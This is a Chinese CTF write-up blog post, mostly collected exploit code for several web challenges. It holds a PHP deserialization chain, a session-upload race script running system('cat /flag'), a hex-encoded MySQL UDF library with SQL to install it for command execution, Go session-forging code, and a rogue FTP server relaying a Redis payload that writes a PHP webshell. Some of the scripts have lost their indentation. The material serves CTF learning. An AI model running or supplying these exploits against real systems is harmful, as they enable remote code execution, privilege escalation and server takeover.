读一下serialize.php，可以直接

<?php
class start_gg 
{
        public $mod1; 
        public $mod2;
        public function __destruct()
        {
                $this->mod1->test1();
        }
}
class Call 
{
        public $mod1; 
        public $mod2;
        public function test1()
    {
            $this->mod1->test2();
    }
}
class funct 
{
        public $mod1; 
        public $mod2;
        public function __call($test2,$arr)
        {
                $s1 = $this->mod1;
                $s1();
        }
}
class func 
{
        public $mod1; 
        public $mod2;
        public function __invoke()
        {
                $this->mod2 = "åç¬¦ä¸²æ¼æ¥".$this->mod1;
        } 
}
class string1 
{
        public $str1;
        public $str2;
        public function __toString()
        {
                $this->str1->get_flag();
                return "1";
        }
}
class GetFlag
{

        
        public function get_flag()
        {
                
                echo highlight_file('secret.php');
        }
}


?>

构造链条

<?php
class start_gg
{
    public $mod1;
    public $mod2;
    public function __destruct()
    {
        $this->mod1->test1();
    }
}
class Call
{
    public $mod1;
    public $mod2;
    public function test1()
    {
        $this->mod1->test2();
    }
}
class funct
{
    public $mod1;
    public $mod2;
    public function __call($test2,$arr)
    {
        $s1 = $this->mod1;
        $s1();
    }
}
class func
{
    public $mod1;
    public $mod2;
    public function __invoke()
    {
        $this->mod2 = "åç¬¦ä¸²æ¼æ¥".$this->mod1;
    }
}
class string1
{
    public $str1;
    public $str2;
    public function __toString()
    {
        $this->str1->get_flag();
        return "1";
    }
}
class GetFlag
{


    public function get_flag()
    {

        echo highlight_file('secret.php');
    }
}
$a=new start_gg();
$b=new Call();
$c=new funct();
$d=new func();
$e=new string1();
$f=new GetFlag();
$e->str1=$f;
$d->mod1=$e;
$c->mod1=$d;
$b->mod1=$c;
$a->mod1=$b;
echo urlencode(serialize($a));

之后就可以看到secret.php的源码，，发现是有字符长度限制的写shell考点，后面还没来得及做，环境就关了。。。。
收藏一下别人的脚本


def start_flag(s):
global stop_threads
while True:
if stop_threads:
break
f = io.BytesIO(b'a' * 1024 * 50)
url = 'http://192.168.41.134:8000/?
gwht=/var/lib/php5/sess_1&ycb=http://127.0.0.1'
headers = {'Cookie': 'PHPSESSID=1', }
data = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('cat
/flag');echo 'flag';?>"} # Payload
files = {"file": ('1.txt', f)}
rest = s.post(url, headers=headers, data=data, files=files)
if 'flag' in r.text:
print(rest.text)
exit()
if __name__ == '__main__':
with requests.session() as session:
while thread_num:
thre = threading.Thread(target=run, args=(s,))
thre.start()
thread_list.append(thre)
for t in thread_list:
t.join()

EasyCurl

这里主要记录一下没见过的考点:udf提权
首先查看一下插件库的路径:

show variables like '%plugin%';

然后将库文件导入到该目录下

select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400') into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb18/plugin/mysqludf.so';

然后再从里面导入函数

create function sys_eval returns string soname 'mysqludf.so';

checkin_go

比赛的时候有找到类似的文章，但是由于go语言第一次见，当时确实有点慌了，哎可惜呀~
关键点在这里:
chekNowMoney这个值我们从代码里可以看到是cookies一定有的并且这个值就是加密后20w的值之后猜测可能是sessions伪造但这个是随机生成的查了相关资料发现 go里面的math/seed 如果没设定默认为1 默认种子为1这就代表着我们随机数可控，那我们伪造sessions就行了伪造一个钱数和管理员。
脚本:

参考链接https://annevi.cn/2020/08/14/wmctf2020-gogogowriteup/#0x04_SSRF_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96
package main
import (
"github.com/gin-contrib/sessions"
"github.com/gin-contrib/sessions/cookie"
"github.com/gin-gonic/gin"
"math/rand"
"fmt"
)
func main() {
r := gin.Default()
storage := cookie.NewStore(randomChar(16))
r.Use(sessions.Sessions("o", storage))
r.GET("/getcookies",cookieHandler)
r.Run("0.0.0.0:8002")
}
func cookieHandler(c *gin.Context){
s := sessions.Default(c)
s.Set("uname", "admin")
s.Set("checkNowMoney", "JkeLNs0tAng7rDdgtr1nDQ")
s.Set("checkPlayerMoney", "JkeLNs0tAng7rDdgtr1nDQ")
s.Set("nowMoney", 200000)
s.Set("playerMoney", 200000)
s.Save()
}
func randomChar(l int) []byte {
output := make([]byte, l)
rand.Read(output)
return output
}

cross the side

是ssrf打redis的题目，可惜了，没有去做一下，因为是刚学到的知识点，对着之前的笔记看看别人的题解吧:
gopher打redis，但是后面的连接其实我是没懂的
先拿个题解好了

import socket
from urllib.parse import unquote
# 对gopherus生成的payload进行一次urldecode
payload =
unquote("%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241
%0D%0A1%0D%0A%2429%0D%0A%0A%0A%3C%3Fphp%20system%28%22cat%20/%2A%22%29%3B%3F
%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0A
dir%0D%0A%2420%0D%0A/var/www/html/public%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%
0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A
1%0D%0A%244%0D%0Asave%0D%0A%0A")
payload = payload.encode('utf-8')
host = '0.0.0.0'
port = 23
sk = socket.socket()
sk.bind((host, port))
sk.listen(5)
# ftp被动模式的passvie port,监听到1234
sk2 = socket.socket()
sk2.bind((host, 1234))
sk2.listen()
# 计数器，用于区分是第几次ftp连接
count = 1
while 1:
conn, address = sk.accept()
conn.send(b"200 \n")
print(conn.recv(20)) # USER aaa\r\n 客户端传来用户名
if count == 1:
conn.send(b"220 ready\n")
else:
conn.send(b"200 ready\n")
print(conn.recv(20)) # TYPE I\r\n 客户端告诉服务端以什么格式传输数据，TYPE
I表示二进制， TYPE A表示文本
if count == 1:
conn.send(b"215 \n")
else:
conn.send(b"200 \n")
print(conn.recv(20)) # SIZE /123\r\n 客户端询问文件/123的大小
if count == 1:
conn.send(b"213 3 \n")
else:
conn.send(b"300 \n")
print(conn.recv(20)) # EPSV\r\n'
conn.send(b"200 \n")
print(conn.recv(20)) # PASV\r\n 客户端告诉服务端进入被动连接模式
if count == 1:
# 36.255.221.156
conn.send(b"227 36,255,221,156,4,210\n") # 服务端告诉客户端需要到哪个
ip:port去获取数据,ip,port都是用逗号隔开，其中端口的计算规则为：4*256+210=1234
else:
print("第二次")
conn.send(b"227 127,0,0,1,0,6379\n") # 端口计算规则：35*256+40=9000
print(conn.recv(20)) # 第一次连接会收到命令RETR /123\r\n，第二次连接会收到
STOR /123\r\n
if count == 1:
conn.send(b"125 \n") # 告诉客户端可以开始数据连接了
# 新建一个socket给服务端返回我们的payload
print("建立连接!")
conn2, address2 = sk2.accept()
conn2.send(payload)
conn2.close()
print("断开连接!")
else:
conn.send(b"150 \n")
print(conn.recv(20))
exit()
# 第一次连接是下载文件，需要告诉客户端下载已经结束
if count == 1:
conn.send(b"226 \n")
conn.close()
count += 1

参考链接：https://mp.weixin.qq.com/s?__biz=MzIzMTQ4NzE2Ng==&mid=2247491162&idx=1&sn=273d86b4c5c4f8758face216497bd87d&chksm=e8a23d8bdfd5b49dd9ea82601cc7683f9debeb91d9cda100230cc25d76d801ab58a5d1443a34&mpshare=1&scene=23&srcid=09125Gbtvppmn5dEsykPwidl&sharer_sharetime=1631456612674&sharer_shareid=1a55b3791775cccd32c32b318eb9206a#rd